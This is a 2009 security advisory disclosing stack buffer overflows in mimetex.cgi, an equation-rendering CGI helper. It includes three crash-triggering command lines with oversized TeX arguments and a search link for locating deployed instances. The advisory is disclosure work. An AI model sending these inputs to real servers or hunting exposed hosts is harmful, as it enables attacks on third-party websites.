CESA-2009-009 - rev 1


[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

mimetex.cgi multiple stack-based buffer overflows



Programs affected: mimetex prior to the 17 June 2009 version
Severity: Arbitrary code execution; information disclosure

mimetex.cgi is a popular helper executable for programatically rendering mathematical equations as an image. Various web forums use it to enhance their discussion of math and science. For better or worse, you can easily find consumers using a Google search:

http://images.google.com/images?hl=en&q=inurl:mimetex.cgi

It had a few classic stack-based buffer overflows, triggered by the following TeX expressions:

./mimetex.cgi "\picture(12,34){(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA$10,10){testing}}"

./mimetex.cgi "\circle(10;`perl -e 'print "A"x400'`)"

./mimetex.cgi "\input[`perl -e 'print "A"x2000'`]{mimetex.cgi}"
In addition, the \environ, \input and \counter directives may be unsuitable for exposure to untrusted input from the internet and have therefore been disabled by default.

Credits


CESA-2009-009 - rev 1
Chris Evans
scarybeasts@gmail.com